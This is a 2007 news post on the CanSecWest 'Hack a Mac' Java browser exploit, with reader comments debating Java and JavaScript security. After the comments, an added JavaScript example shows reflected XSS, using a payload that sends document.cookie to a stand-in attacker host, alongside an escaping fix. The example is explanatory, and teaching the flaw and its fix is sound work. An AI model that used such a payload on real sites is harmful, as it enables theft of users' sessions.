CanSecWest MacBook Pro challenge exploits Java-enabled browsers, including Firefox

“According to Matasano (home base for security researcher Dino Dai Zovi), the announced-but-unreleased web browser exploit that was used to win the CanSecWest MacBook Pro challenge involves browser support for Java. Turn off Java for Safari (or Firefox, or Camino) and your machine is immune,” Michael Rose reports for TUAW.

Full article here.

“The vulnerability affects Firefox as well as Safari,” Matasano Chargen reports.

Full article here.

[Thanks to MacDailyNews Reader “Adam W.” for the heads up.]

MacDailyNews Take: The story clarifies. As it always seems to do after the damage is done in the media (meanwhile, Mac users continue to surf the Web unaffected). So, that’s some Mac OS X “hack,” huh? Ten grand and a MacBook Pro for that? Pfft. We await InfoWorld’s next hysterical headline regarding this developing story with bated breath.

MacDailyNews Note: To protect yourself from this unreleased-in-the-wild, yet extremely over-publicized scourge, in Safari’s Preferences, uncheck “Enable Java” in the “Security” tab. In Firefox’s Preferences, uncheck “Enable Java” in the “Content” tab.

Related articles:
InfoWorld publishes false report on Apple Mac security – April 21, 2007
CanSecWest’s $10,000 ‘Hack a Mac’ challenge relaxes barriers, finds exploitable hole in Safari – April 20, 2007
Apple MacBooks hold strong, remain unhacked after first day of $10,000 ‘Hack a Mac’ challenge – April 20, 2007
CanSecWest sweetens ‘Hack a Mac’ contest pot to $10,000 – April 20, 2007
CanSecWest to hold ‘PWN to OWN’ contest: pits Apple MacBook Pros vs. hackers – March 26, 2007
Microsoft’s oft-delayed, much-pared-down Windows Vista hacked at Black Hat – August 07, 2006
Microsoft publicity stunt asks hackers to attack Windows Vista – August 04, 2006
Apple Mac remains ‘unhacked’ as University of Wisconsin’s Mac OS X Security Challenge ends – March 08, 2006
Mac OS X ‘unhacked’ over 24 hours and counting in genuine security challenge – March 07, 2006

44 Comments

  1. A-Hole has this on the article…

    EXCLUSIVE: MUST CREDIT MATASANO

    More details as they become available. In the meantime, a drinking game: predict the rationalizations given by Mac zealots for why this finding “doesn’t count”.

    I’ll start: “It took $10,000 to break a Mac, but people break Windows machines for free every day!”

    What a windows fanboy trolling for hits…

  2. @Macaday

    Turning off Java doesn’t affect Apple.com at all. Silly boy.

    You didn’t turn off “Javascript”, did you? Those are very different beasts, Java and Javascript.

  3. I’m a bit surprised that the exploit uses Java instead of javascript. I always thought of Java as being very secure by design, a very strict and well thought out platform. Javascript, on the other hand, is pretty much anything goes, and is taken advantage of in the vast majority of browser hacks (in windows, at least.)

  4. @WiseGuy – How the hell is the EFI going to connect to my wireless network (only one active on my home network)? Seriously, does the EFI load all the pieces necessary for an active network connection, I think not.

    Stop the FUD!

    MDN word: rest, as in give it a rest….

  6. Traveller wrote: “I’m a bit surprised that the exploit uses Java instead of javascript. I always thought of Java as being very secure by design, a very strict and well thought out platform. Javascript, on the other hand, is pretty much anything goes, and is taken advantage of in the vast majority of browser hacks (in windows, at least.)”

    Actually, it’s the other way around, as far as security goes, because one can do so much more with Java. It has access, for example, to the underlying OS, and so it has access to your hard drive, etc. Javascript, on the other hand, is much more limited in what it can do.

    Java has always posed a threat, in my mind, and so i have always kept it turned off. I am not surprised that someone was able to use it as an exploit. It bears saying that all the hacker had to do to win the prize was to read a file on the disc, and follow its instructions. With Java, one can access files. My understanding of this exploit is that they were able to trick Java into thinking they should be granted root access for reading files (and nothing more).

    I think i have only ever encountered two or three websites which wanted Java turned on for one reason or another. On the other hand, i have encountered many websites which expected and/or depend on Javascript.

    It’s unfortunate that Javascript is called what it is. As others have mentioned, they are completely different critters, and most folks don’t know that, nor the difference between them.

  7. Rainy Day wrote “Actually, it’s the other way around, as far as security goes, because one can do so much more with Java.”

    I highly doubt that. According to Wikipedia, “Java has similar security issues but these are considered less serious because the Java virtual machine provides a well-defined sandboxing model today (as of 2007) require Java, whereas many use JavaScript.”

    This is pretty tough to explain exactly; you probably won’t be able to really understand the subtle differences between Java and Javascript without having first-hand programming experience.

    Java is a high-level object-oriented programming language that has a strong emphasis on encapsulation. Every Java object and subroutine has a privacy modifier such as “public” or “private” that is meant to restrict access between different programs whenever possible. Javascript also has objects and privacy modifiers, but they were added to the language later; they are not an integral part of its design like Java. Many features have actually been added to Javascript over the years, so that it is just as, if not more, powerful than Java. The advantage of Java is not its power, but its more restrictive design, which gives it better security and more coherent structures.

    Also, Java runs between platforms as byte-code, semi-compiled programs that can run on any platform that implements a Java virtual machine. Javascript, on the other hand, runs as a script which is compiled as the browser reads the Javascript. It does not have a virtual machine to implicitly manage sandboxing it.

    I also know for a fact that there are numerous websites that will instantly infect a Windows computer with a trojan by using Javascript (many, many websites! mostly porn sites.) I don’t know of any sites that do this through Java; I’m sure some exist, since both languages have similar security issues, but Javascript exploits are more common because they are easier and nearly every web browser uses Javascript.

  8. Correction: The Wikipedia quote from its Javascript page reads:

    “Java has similar security issues but these are considered less serious because the Java virtual machine provides a well-defined sandboxing model and few Web sites today (as of 2007) require Java, whereas many use JavaScript.”

  9. While this does need to be addressed by Apple, the fundamental flaw revolves around java and QT interaction.

    The solution, and one we have utilized for several years now, is this.

    1) Set up an Admin account and never use it. (Just for the most essential of installs.)

    2) Set up a clean standard account. Never touch it; only use it when troubleshooting.

    3) Set up your standard user accounts. Keep Java enabled but only browse to sites that are trusted. We literally use only about a handful of sites on a daily basis, so it is not that difficult. Browsers such as Safari and Camino and Firefox allow some level of protection toward limiting what certain sites can do. Learn them and use them. Safari by parental control, Camino and FF by preferences.

    4) Set up a separate and either standard or limited user account that is used for general web surfing (i.e. untrusted sites). This account is used only for web surfing and other non-essential tasks if you so see fit. If you are so privileged, use an entirely different and isolated Mac for general web surfing (instead of just a separate account).

    The web is a fun place and there are great sites out there, but as is always the case there are bad neighborhoods. I am not naive enough to believe that Mac OS X is invulnerable, as it is always the things you don’t know that hurt you the most.

  10. If you want to use Noscript, that’s fine for you. But I can’t be bothered to constantly give websites permission to run. Almost every website I use has Javascript. This website is using it right now to let us post comments!

    There is so little chance of finding a malicious script that works on a mac. And with my kind of luck, (the bad kind), the one time I find one these websites on a mac, I will have clicked the allow button or whatever to let it run through NoScript, not knowing it was a bad script. I would have just wasted all that time blocking innocent scripts just to let the one bad one through. That’s some windows type security shit! I switched to mac to not have to worry about things like that.

  11. “There is so little chance of finding a malicious script that works on a mac”

    Well, it depends on your definition of “malicious”.
    If stealing your credentials and/or peeking in your web mail is malicious enough, I bet you’ll have fun here:

    After you understand what XSS is, what it can do and how it is completely OS-independent (it just needs any JavaScript-enabled browser), you may reconsider NoScript.

    http://noscript.net
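The XSS point raised in the comment above, as an added example that is not part of the original article or any commenter's post: a search page that reflects a query parameter into its own HTML, first with the untrusted value concatenated straight into markup, then with it escaped for the HTML context. The page, the `q` parameter, the `search.example` and `evil.example` hosts and the cookie-stealing payload are all constructed for illustration. The code runs under Node with no browser, because the only thing that matters here is how the web application handles a string; that is the sense in which this class of attack does not care what operating system the browser runs on.

```javascript
// Added example, not the article's or the commenter's code. The page layout,
// the "q" parameter and the hostnames below are hypothetical.

// Minimal HTML escaping for text placed between tags or inside a
// double-quoted attribute. Covers the five characters that can change the
// HTML context; it is not sufficient for URL, CSS or script contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Pull the "q" parameter the way a naive search page might. URL.searchParams
// percent-decodes the value, so whatever the attacker encoded comes back raw.
function getQuery(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Vulnerable: the reflected-XSS pattern. Untrusted input is concatenated
// directly into markup, so a value containing "<script>" becomes a script.
function renderUnsafe(url) {
  return '<p>Results for: ' + getQuery(url) + '</p>';
}

// Fixed: the same page, with the input escaped before it reaches the HTML
// context. The browser now shows the payload as text instead of running it.
function renderSafe(url) {
  return '<p>Results for: ' + escapeHtml(getQuery(url)) + '</p>';
}

// Constructed attack URL. The payload would ship the victim's cookies for
// search.example to an attacker-controlled host; both hosts are made up.
const PAYLOAD =
  '<script>new Image().src="https://evil.example/c?"+document.cookie</script>';
const ATTACK_URL =
  'https://search.example/?q=' + encodeURIComponent(PAYLOAD);

// Crude detection check: did a script element appear in output that the
// page author never wrote? Good enough for this demonstration, not a scanner.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demo when run directly: `node xss_reflect.js`
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderUnsafe(ATTACK_URL));
  console.log('safe:  ', renderSafe(ATTACK_URL));
  console.log('unsafe has script tag:', containsScriptTag(renderUnsafe(ATTACK_URL)));
  console.log('safe has script tag:  ', containsScriptTag(renderSafe(ATTACK_URL)));
}
```

Note that the fix lives on the server side of the page, not in the victim's browser; NoScript, as the comment suggests, is the client-side mitigation for pages that get this wrong.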
